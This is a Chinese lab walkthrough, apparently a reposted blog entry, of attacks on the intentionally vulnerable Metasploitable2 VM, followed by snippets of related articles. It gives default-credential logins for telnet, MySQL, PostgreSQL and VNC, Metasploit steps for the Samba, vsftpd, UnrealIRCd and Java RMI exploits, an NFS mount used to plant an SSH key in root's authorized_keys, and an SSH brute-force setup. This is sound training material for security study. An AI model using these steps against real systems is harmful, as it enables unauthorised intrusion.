metasploitable2渗透测试

一、系统弱密码登录

1、在kali上执行命令行telnet 192.168.26.129

2、Login和password都输入msfadmin

3、登录成功,进入系统

4、测试如下:

 

 

二、MySQL弱密码登录:

1、在kali上执行mysql –h 192.168.26.129  –u root

2、登录成功,进入MySQL系统

3、测试效果:

 

三、PostgreSQL弱密码登录

1、在Kali上执行psql -h 192.168.26.129 –U postgres

2、输入密码:postgres

3、登录成功,进入postgresql系统

测试效果

四、VNC弱密码登录

1、在kali图形界面的终端中执行vncviewer 192.168.26.129

2、输入密码 password

3、登录成功,进入系统

测试效果:

五、Samba MS-RPC Shell 命令注入漏洞

利用步骤

 1.在kali中执行msfconsole,启动metasploit

 2.Use exploit/multi/samba/usermap_script,选择漏洞库

 3.Set RHOST 192.168.26.129 设置要攻击的机器IP

 4.Exploit,开始攻击

 5.利用成功,执行uname –a 验证

测试效果:

 

六、Vsftpd源码包后门漏洞

步骤

1、在kali中执行msfconsole,启动metasploit

2、use exploit/unix/ftp/vsftpd_234_backdoor,选择漏洞

3、set RHOST 192.168.26.129

4、利用成功,执行uname –a 验证

5、测试过程:

 

七、UnreallRCd后门漏洞

步骤

1、在kali中执行msfconsole,启动metasploit

2、use exploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞

set RHOST 192.168.26.129 ,设置要攻击的目标IP地址

3、开始攻击

4、利用成功!使用uname –a 验证

测试效果:

 

  • 八、Linux NFS共享目录配置漏洞

问题:在(2)中需要创建 /tmp/test目录并在目录下创建,如未创建则不能进行下一步

步骤

  1. 在kali上执行命令rpcinfo –p 192.168.26.129 ,查看nfs服务有无开启
  2. showmount –e 19168.26.129 查看其设置的远程目录列表
  3. 输入ssh-keygen 生成RSA公钥
  4. 依次输入:

(1)mount –t nfs 192.168.26.129://tmp/test(预先创建),把192.168.160.131的根目录挂载到/tmp/test/下;

注:如果提示下图中错误则需要/etc/init.d/rpcbind start 来启动mount

(2)cat /root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下:

(3)ssh  root@192.168.26.129,实现无密码登录

九、Java RMI SERVER 命令执行漏洞(1099/tcp)

1.Nmap –p 0-65535 192.168.26.129 来查看1099端口是否开启

2.进入msfconsole框架,依次输入以下命令:

1)use exploit/multi/misc/java_rmi_server

2)set RHOST 192.168.26.129(靶机的IP地址)

3)run

4)session

5)shell(进入meterpreter时执行)

十、Root用户弱口令漏洞(SSH爆破)

步骤

  1. 输入nmap –sV  -O(大写) 192.168.26.129 查看SSh端口是否开启
  2. 开启metasploit framework 框架,依次输入:
    1. use auxiliary/scanner/ssh/ssh_login
    2. set RHOSTS 192.168.26.129
    3. set USERNAME root
    4. set PASS_FILE  pass.txt(字典文件,需要预先生成)
    5. set THREADS 50
    6. run

我在网上找了Metasploitable2  靶机,下载了解压出来,打开直接能用

链接:https://pan.baidu.com/s/1gV75x5wV4-1TsDTIZoImXw
提取码:gx9z
 

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/375103.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Portainer.io:让容器管理变得更加直观

在现代软件开发和部署中,容器化技术已经变得越来越流行。Docker 是其中一种领先的容器化平台,而 Portainer.io 则是一个优秀的管理工具,使得 Docker 的使用变得更加简单和可视化。本文将介绍 Portainer.io 的基本功能和如何在 Docker 上安装和…

python开发的一些tips

1. Notepad编写python脚本 1)新建文件,编写代码 2)点击菜单栏,“语言”—>“P”—>“Python”,设置脚本为Python语言的高亮(这样保存文本的时候,Notepad也可以自动识别文件类型为.py&…

metasploitable3渗透测试

1、攻击windows服务器漏洞 用nmap对网段进行扫描nmap -sP 192.168.123 在进行IP扫描 发现Windows服务器漏洞 步骤: msfconsole---进入渗透模块

以前写的一个下载小说的工具

因为当时发现只有一个站点有。但是时时联网的要求太让人不爽。就写了一个给全下下来了。 用到了: 1. 正则表达式,分析章节和内容; 2. 线程池下载,并且对下载中的相关超时做了一些处理; 3. 文件生成与写入,注意格式问题…

数学之路-python计算实战(14)-机器视觉-图像增强(直方图均衡化)

我们来看一个灰度图像,让表示灰度出现的次数,这样图像中灰度为 的像素的出现概率是是图像中全部的灰度数, 是图像中全部的像素数, 实际上是图像的直方图,归一化到 。把 作为相应于 的累计概率函数, 定义为:是图像的…

Windows2008的安装

点击下一步 点击安装 选择第三个,点击下一步 点击下一步 点自定义安装 我在这里分两个盘并格式化 接下来就是等待安装完成即可

redhat linux7.0的安装

选择第一个 我选择中文 点击开始安装 设置root用户密码 完成如上图所示 我在网上找了一个redhat7.0镜像供大家使用 链接:https://pan.baidu.com/s/1WhG8BGZTZawDKTNlaAvzRg 提取码:uzpd

VMware虚拟机安装

创建新的虚拟机:在 VMWare 中创建虚拟机,要求设置内存大小为 1G,CPU 为 2,硬盘大小自行选择,网络连接采用 NAT 模式,其他保持默认即可 上面是安装啥系统就选啥系统 下一步 下一步 磁盘大小按自己需求来

二叉树算法:中序、后序推导先序(数组递归实现 【*模板】)

中根序列和后根序列重建二叉树 描述我们知道如何按照三种深度优先次序来周游一棵二叉树,来得到中根序列、前根序列和后根序列。反过来,如果给定二叉树的中根序列和后根序 列,或者给定中根序列和前根序列,可以重建一二叉树。本题输…

Windows主机安全加固

Windows主机安全加固 账户安全 更名administrator本地用户并禁用guest账户步骤: 点击“开始”,找到“管理工具”,点击里面的“计算机管理”,找到“本地用户和组”

JS笔记 入门第四

小测试:注意:取消所有的设定可以直接使用document.getElementById("txt").removeAttribute("style");这个是个神奇的东西.<!DOCTYPE HTML><html><head><meta http-equiv"Content-Type" Content"text/html; charsetutf…

数论神题——进击的羊角兽

数论神题 进击的羊角兽 题目描述&#xff1a; 求满足 \(ab|ab(a,b \leq n,a \neq b)\)的有序数对\((a,b)\)的个数。 solution 设\((a,b)d , (a < b \leq n)\),则$ axd , byd , ( x < y )$ \(ab|ab\) \((xy)d|xyd^2\) \(\because (xy, x)1,(xy, y)1\) \(\therefore (xy)|d…

靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1

兄弟们第一天打vulnhub靶场&#xff0c;我kali连靶场ip都扫不到&#xff0c;泪奔了&#xff0c;不说了开整 注意&#xff1a; vm虚拟机里面的编辑下面的虚拟机网络编辑器&#xff0c;把除了NAT模式外的模式&#xff0c;其他模式不启动。 至于为什么要这样操作&#xff0c;感觉…

靶场练习第二天~vulnhub靶场之 THE PLANETS: EARTH

前期准备&#xff1a; 靶机下载链接: https://pan.baidu.com/s/1_w8OZOPVsQaojq2rnKcdRA 提取码: gguw kali攻击机ip&#xff1a;192.168.101.10 靶机地址&#xff1a;192.168.101.101 一、信息收集 1.nmap扫描 因为kali与靶机在同一个网段下&#xff0c;使用nmap 192.168…

测试与封装5.1

我的队友是52吴舒婷&#xff0c;博客内容主要是白盒黑盒的测试数据分析 我们通过简单的四则运算来进行程序的测试与封装 我们主要完成的是事情 &#xff08;1&#xff09;封装&#xff1a;将运算要运用的方法进行封装 文件主要有三个&#xff1a;Calculate&#xff08;存放运算…

springmvc学习笔记--mybatis--使用插件自动生成实体和mapper

由于表对象在开发过程中会增删字段&#xff0c;有时候需要重新生成实体和对应的mapper&#xff0c;这时候可以通过mybatis的插件的生成。 优点是快速简洁&#xff0c;缺点同样很明显&#xff1a;覆盖。因此&#xff0c;通常是在第一次搭建框架的时候使用&#xff0c;因为开发过…

靶场练习第三天~vulnhub靶场之narak

靶机下载链接: https://pan.baidu.com/s/1GxcSL6efwd0GcbY45WsD0A 提取码: dhr5 一、信息收集 1.使用namp 192.168.101.0/24扫描该网段的地址&#xff0c;寻找靶机IP 2.直接访问192.168.101.102 3.进行目录扫描&#xff0c;dirb目录扫描工具&#xff08;kali自带的&#xff…

靶场练习第四天~vulnhub靶场之Lazysysadmin

靶机下载链接: https://pan.baidu.com/s/1MMkgaYLRc78YX4s6nvqdjQ 提取码: djpm 信息收集 查看kali的IP 使用nmap 192.168.101.0/24 探测靶机IP 发现开放445端口&#xff0c;并且开放的服务microsoft-ds。可以用enum4linux工具来扫描共享文件&#xff0c;使用方法: enum4linux…

关于代码手写UI,xib和StoryBoard

代码手写UI 这种方法经常被学院派的极客或者依赖多人合作的大型项目大规模使用。Geek们喜欢用代码构建UI&#xff0c;是因为代码是键盘敲出来的&#xff0c;这样可以做到不开IB&#xff0c;手不离开键盘就完成工作&#xff0c;可以专注于编码环境&#xff0c;看起来很cool很高效…

靶场练习第五天~vulnhub靶场之basic_pentesting_1

一、信息收集 1.主机发现 靶机下载链接: https://pan.baidu.com/s/143q3cbZG6-8y8kMk51Lc_Q 提取码: i8hv &#xff08;1&#xff09;Netdiscover&#xff1a;专用的二层发现工具&#xff0c;拥有主动和被动发现两种方式 具体操作如下&#xff0c;查看一下kali的ip 然后使用…